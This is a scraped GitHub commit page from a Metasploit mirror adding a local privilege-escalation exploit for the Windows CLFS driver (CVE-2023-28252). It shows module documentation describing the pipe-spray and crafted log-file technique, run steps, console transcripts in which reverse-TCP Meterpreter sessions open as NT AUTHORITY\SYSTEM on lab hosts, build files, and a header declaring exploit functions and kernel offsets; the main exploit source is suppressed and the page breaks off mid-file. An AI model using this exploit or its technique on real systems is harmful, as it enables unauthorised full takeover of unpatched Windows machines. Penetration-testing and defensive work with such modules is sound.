mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-09 04:26:11 +02:00
Land #18250, CVE-2023-28252: Windows CLFS Driver Privilege Escalation
This commit is contained in:
commit
8b56dc0117
BIN
data/exploits/CVE-2023-28252/CVE-2023-28252.x64.dll
Executable file
BIN
data/exploits/CVE-2023-28252/CVE-2023-28252.x64.dll
Executable file
Binary file not shown.
@ -0,0 +1,129 @@
|
||||
## Vulnerable Application
|
||||
|
||||
A privilege escalation vulnerability exists in the clfs.sys driver which comes installed by default on
|
||||
Windows 10 21H2, Windows 11 21H2 and Windows Server 2022 (Build 20348) operating systems.
|
||||
|
||||
The clfs.sys driver contains a function CreateLogFile that is used to create
|
||||
open and edit '*.blf' (base log format) files. Inside a .blf file there are multiple blocks of data which
|
||||
contain checksums to verify the integrity of the .blf file and to ensure the file looks and acts like a
|
||||
.blf file. However, these files can be edited with CreateFileA or with fopen and then modified with
|
||||
WriteFile or fwrite respectively in order to change the contents of the file and update their checksums accordingly.
|
||||
|
||||
This exploit makes use to two different kinds of specially crafted .blf files that are edited using the technique
|
||||
mentioned above. There are multiple spray .blf files. The spray .blf files are specially crafted to initiate an out of
|
||||
bounds read which reads from a contiguous block of memory. The block of memory it reads from contains a read-write pipe
|
||||
that points to the address of the second type of .blf file - the trigger .blf file. The trigger .blf file is specially
|
||||
crafted read the SYSTEM token and write it in the process of the exploit to achieve the local privilege escalation.
|
||||
|
||||
The exploits creates a controlled memory space by first looping over the CreatePipe function to
|
||||
to create thousands of read-write pipes (which take up 0x90 bytes of memory). It then releases a certain number of
|
||||
pipes from memory and calls CreateLogFile to open the pre-existing spray .blf files which when being opened fill the
|
||||
0x90 byte gaps created by the deallocation of the pipes in memory, creating the controlled memory space.
|
||||
|
||||
This is a very brief and high overview description of what the exploit is actually doing. For a more detailed and in
|
||||
depth analysis please refer to the following [reference](https://github.com/fortra/CVE-2023-28252).
|
||||
|
||||
### Installation And Setup
|
||||
Windows 11 versions 21H2 are vulnerable out of the box.
|
||||
This exploit module has been tested on Windows 11 versions 21H2 build 22000.
|
||||
|
||||
## Options
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
1. Get a Meterpreter session on a vulnerable host
|
||||
1. Do: `use windows/local/cve_2023_28252_clfs_driver`
|
||||
1. Set the `SESSION` and `PAYLOAD` options
|
||||
1. Do: `run`
|
||||
1. You should get a privileged session.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Windows Server 2022 Build 20348 x64
|
||||
```
|
||||
msf6 exploit(multi/handler) > use windows/local/cve_2023_28252_clfs_driver
|
||||
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.199.1:4443
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
|
||||
[*] Launching msiexec to host the DLL...
|
||||
[+] Process 6080 launched.
|
||||
[*] Reflectively injecting the DLL into 6080...
|
||||
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
|
||||
[*] Sending stage (200774 bytes) to 172.16.199.134
|
||||
[*] Meterpreter session 11 opened (172.16.199.1:4443 -> 172.16.199.134:49864) at 2023-07-31 13:44:35 -0400
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter > sysinfo
|
||||
Computer : WIN-2EEL7BRDUD8
|
||||
OS : Windows 2016+ (10.0 Build 20348).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 1
|
||||
Meterpreter : x64/windows
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
### Windows 11 Version 21H2 Build 22000 x64
|
||||
```
|
||||
msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > sessions -i 1
|
||||
[*] Starting interaction with 1...
|
||||
msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > rexploit
|
||||
[*] Reloading module...
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.199.1:4443
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable. The target is running windows version: 10.0.22000.0 which has a vulnerable version of clfs.sys installed by default
|
||||
[*] Checking compatibility
|
||||
[*] Launching netsh to host the DLL...
|
||||
[+] Process 9124 launched.
|
||||
[*] Reflectively injecting the DLL into 9124...
|
||||
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
|
||||
[*] Sending stage (200774 bytes) to 172.16.199.132
|
||||
[*] Meterpreter session 4 opened (172.16.199.1:4443 -> 172.16.199.132:49894) at 2023-07-31 11:24:01 -0400
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter > sysinfo
|
||||
Computer : MSFDEVICE
|
||||
OS : Windows 10 (10.0 Build 22000).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x64/windows
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
### Windows 10 Version 19042 x64
|
||||
```
|
||||
msf6 exploit(multi/handler) > use windows/local/cve_2023_28252_clfs_driver
|
||||
msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.199.1:4443
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable. The target is running windows version: 10.0.19042.0 which has a vulnerable version of clfs.sys installed by default
|
||||
[*] Launching netsh to host the DLL...
|
||||
[+] Process 4888 launched.
|
||||
[*] Reflectively injecting the DLL into 4888...
|
||||
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
|
||||
[*] Sending stage (200774 bytes) to 172.16.199.131
|
||||
[*] Meterpreter session 13 opened (172.16.199.1:4443 -> 172.16.199.131:49840) at 2023-07-31 14:34:37 -0400
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter > sysinfo
|
||||
Computer : DESKTOP-8ATHH6O
|
||||
OS : Windows 10 (10.0 Build 19042).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x64/windows
|
||||
meterpreter >
|
||||
```
|
31
external/source/exploits/CVE-2023-28252/CVE-2023-28252.sln
vendored
Executable file
31
external/source/exploits/CVE-2023-28252/CVE-2023-28252.sln
vendored
Executable file
@ -0,0 +1,31 @@
|
||||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio Version 16
|
||||
VisualStudioVersion = 16.0.33801.447
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2023-28252", "CVE-2023-28252\CVE-2023-28252.vcxproj", "{C1983EC8-C84D-4284-85CA-AF4F06AE0398}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|x64 = Debug|x64
|
||||
Debug|x86 = Debug|x86
|
||||
Release|x64 = Release|x64
|
||||
Release|x86 = Release|x86
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Debug|x64.Build.0 = Debug|x64
|
||||
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Debug|x86.ActiveCfg = Debug|Win32
|
||||
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Debug|x86.Build.0 = Debug|Win32
|
||||
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Release|x64.ActiveCfg = Release|x64
|
||||
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Release|x64.Build.0 = Release|x64
|
||||
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Release|x86.ActiveCfg = Release|Win32
|
||||
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Release|x86.Build.0 = Release|Win32
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||
SolutionGuid = {3FD03BC0-5F34-4393-AEB8-3B2F1EC49E5B}
|
||||
EndGlobalSection
|
||||
EndGlobal
|
240
external/source/exploits/CVE-2023-28252/CVE-2023-28252/CVE-2023-28252.vcxproj
vendored
Executable file
240
external/source/exploits/CVE-2023-28252/CVE-2023-28252/CVE-2023-28252.vcxproj
vendored
Executable file
@ -0,0 +1,240 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<VCProjectVersion>16.0</VCProjectVersion>
|
||||
<ProjectGuid>{c1983ec8-c84d-4284-85ca-af4f06ae0398}</ProjectGuid>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<RootNamespace>CVE_2023_28252</RootNamespace>
|
||||
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="Shared">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
|
||||
<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
|
||||
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
|
||||
<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
|
||||
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
|
||||
<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
|
||||
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||
<GenerateManifest>false</GenerateManifest>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
|
||||
<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
|
||||
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||
<GenerateManifest>false</GenerateManifest>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>NotUsing</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>false</ConformanceMode>
|
||||
<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
|
||||
<AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||
<TreatWarningAsError>false</TreatWarningAsError>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<StringPooling>true</StringPooling>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableUAC>false</EnableUAC>
|
||||
<GenerateMapFile>true</GenerateMapFile>
|
||||
<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
|
||||
<MapFileName>$(OutDir)$(TargetName).map</MapFileName>
|
||||
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||
<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
|
||||
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>NotUsing</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>_DEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>false</ConformanceMode>
|
||||
<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
|
||||
<AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;..\..\..\include\windows;..\..\include\windows;..\include\windows;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||
<TreatWarningAsError>false</TreatWarningAsError>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<StringPooling>true</StringPooling>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableUAC>false</EnableUAC>
|
||||
<GenerateMapFile>true</GenerateMapFile>
|
||||
<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
|
||||
<MapFileName>$(OutDir)$(TargetName).map</MapFileName>
|
||||
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||
<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
|
||||
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>NotUsing</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>false</IntrinsicFunctions>
|
||||
<SDLCheck>
|
||||
</SDLCheck>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>false</ConformanceMode>
|
||||
<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
|
||||
<AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||
<TreatWarningAsError>false</TreatWarningAsError>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<StringPooling>true</StringPooling>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
|
||||
<ObjectFileName>$(OutDir)\</ObjectFileName>
|
||||
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<EnableUAC>false</EnableUAC>
|
||||
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
<GenerateMapFile>false</GenerateMapFile>
|
||||
<MapFileName>$(OutDir)$(TargetName).map</MapFileName>
|
||||
<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
|
||||
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||
<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>NotUsing</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>false</IntrinsicFunctions>
|
||||
<SDLCheck>
|
||||
</SDLCheck>
|
||||
<PreprocessorDefinitions>NDEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>false</ConformanceMode>
|
||||
<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
|
||||
<AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;..\..\..\include\windows;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||
<TreatWarningAsError>false</TreatWarningAsError>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<StringPooling>true</StringPooling>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
|
||||
<ObjectFileName>$(OutDir)\</ObjectFileName>
|
||||
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<EnableUAC>false</EnableUAC>
|
||||
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
<GenerateMapFile>false</GenerateMapFile>
|
||||
<MapFileName>$(OutDir)$(TargetName).map</MapFileName>
|
||||
<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
|
||||
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||
<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="clfs_eop.cpp" />
|
||||
<ClCompile Include="dllmain.cpp" />
|
||||
<ClCompile Include="exploit.cpp" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="clfs_eop.h" />
|
||||
<ClInclude Include="crc32.h" />
|
||||
<ClInclude Include="exploit.h" />
|
||||
<ClInclude Include="ntos.h" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Library Include="ntoskrnl.lib" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
1417
external/source/exploits/CVE-2023-28252/CVE-2023-28252/clfs_eop.cpp
vendored
Executable file
1417
external/source/exploits/CVE-2023-28252/CVE-2023-28252/clfs_eop.cpp
vendored
Executable file
File diff suppressed because it is too large
Load Diff
121
external/source/exploits/CVE-2023-28252/CVE-2023-28252/clfs_eop.h
vendored
Executable file
121
external/source/exploits/CVE-2023-28252/CVE-2023-28252/clfs_eop.h
vendored
Executable file
@ -0,0 +1,121 @@
|
||||
//
|
||||
//
|
||||
#pragma warning (disable : 4005)
|
||||
#pragma warning(disable:28159)
|
||||
|
||||
#pragma once
|
||||
#include <stdio.h>
|
||||
#include <iostream>
|
||||
#include <windows.h>
|
||||
#include <clfsw32.h>
|
||||
#include <ntstatus.h>
|
||||
#include <processthreadsapi.h>
|
||||
#include <tlhelp32.h>
|
||||
#include "ntos.h"
|
||||
#include "crc32.h"
|
||||
|
||||
#pragma comment(lib, "ntdll.lib")
|
||||
#pragma comment(lib, "Clfsw32.lib")
|
||||
|
||||
VOID FindKernelModulesBase();
|
||||
|
||||
//
|
||||
// NT syscalls
|
||||
//
|
||||
#define SystemModuleInformation 0xb
|
||||
#define SystemHandleInformation 0x10
|
||||
|
||||
|
||||
typedef struct _SYSTEM_BIGPOOL_ENTRY {
|
||||
union {
|
||||
PVOID VirtualAddress;
|
||||
ULONG_PTR NonPaged : 1;
|
||||
};
|
||||
SIZE_T SizeInBytes;
|
||||
union {
|
||||
UCHAR Tag[4];
|
||||
ULONG TagUlong;
|
||||
};
|
||||
} SYSTEM_BIGPOOL_ENTRY, * PSYSTEM_BIGPOOL_ENTRY;
|
||||
|
||||
|
||||
typedef struct _SYSTEM_BIGPOOL_INFORMATION {
|
||||
ULONG Count;
|
||||
SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1];
|
||||
} SYSTEM_BIGPOOL_INFORMATION, * PSYSTEM_BIGPOOL_INFORMATION;
|
||||
|
||||
|
||||
typedef NTSTATUS(WINAPI* _NtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG);
|
||||
|
||||
typedef NTSTATUS(NTAPI* _NtWriteVirtualMemory)(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);
|
||||
|
||||
|
||||
|
||||
//
|
||||
// Version dependent offsets
|
||||
//
|
||||
#define OFFSET_OF_PREVIOUS_MODE 0x232
|
||||
#define OFFSET_OF_WIN32PROCESS 0x3b0
|
||||
#define OFFSET_OF_SEP_TOKEN_PRIVILEGES 0x40
|
||||
#define OFFSET_OF_DCOMPOSITIONPROCESS 0x100
|
||||
|
||||
|
||||
//
|
||||
// CInteractionTrackerMarshaler object offsets
|
||||
//
|
||||
#define OFFSET_OF_FUNCTION 0x50
|
||||
#define OBJECT_SIZE 0x1a0
|
||||
typedef NTSTATUS func(HANDLE, HANDLE, PIO_APC_ROUTINE, PVOID, PIO_STATUS_BLOCK, ULONG, PVOID, ULONG, PVOID, ULONG);
|
||||
typedef NTSTATUS func3(HANDLE, HANDLE, PIO_APC_ROUTINE, PVOID, PIO_STATUS_BLOCK, ULONG, PVOID, ULONG, PVOID, ULONG);
|
||||
|
||||
|
||||
class clfs_eop
|
||||
{
|
||||
public:
|
||||
|
||||
clfs_eop() {};
|
||||
~clfs_eop() {};
|
||||
|
||||
//int crcCalculatorAndFix(char*, int);
|
||||
|
||||
void fun_pipeSpray(int value, UINT64* temp_buffer);
|
||||
|
||||
void getVirtualAddress();
|
||||
|
||||
SIZE_T GetObjectKernelAddress(HANDLE Object);
|
||||
|
||||
VOID InitEnvironment();
|
||||
|
||||
int createInitialLogFile();
|
||||
|
||||
UINT64 getBigPoolInfo();
|
||||
|
||||
VOID craftbaseFile(FILE* pfile);
|
||||
|
||||
VOID craftSprayFile(FILE* pfile);
|
||||
|
||||
int FixCRCFile(WCHAR* _stored_temp_open);
|
||||
|
||||
int crcCalculatorAndFix(char* mybuf, int mysize);
|
||||
|
||||
int doFirstAlloc();
|
||||
|
||||
VOID FindKernelModulesBase();
|
||||
|
||||
void manage_args(int argc, TCHAR* argv[]);
|
||||
|
||||
VOID RunPayload();
|
||||
|
||||
void fun_prepare();
|
||||
|
||||
WCHAR* logFileNames(int _i);
|
||||
|
||||
WCHAR* containerNames(int _i);
|
||||
|
||||
WCHAR* fileNames(int _i);
|
||||
|
||||
int fun_trigger(WCHAR* _logfilename, WCHAR* _fopenfilename);
|
||||
|
||||
void to_trigger();
|
||||
|
||||
};
|
45
external/source/exploits/CVE-2023-28252/CVE-2023-28252/crc32.h
vendored
Executable file
45
external/source/exploits/CVE-2023-28252/CVE-2023-28252/crc32.h
vendored
Executable file
@ -0,0 +1,45 @@
|
||||
#pragma once
|
||||
|
||||
#include <stdint.h>
|
||||
|
||||
|
||||
struct crc32
|
||||
{
|
||||
static void generate_table(uint32_t(&table)[256])
|
||||
{
|
||||
uint32_t polynomial = 0xEDB88320;
|
||||
for (uint32_t i = 0; i < 256; i++)
|
||||
{
|
||||
uint32_t c = i;
|
||||
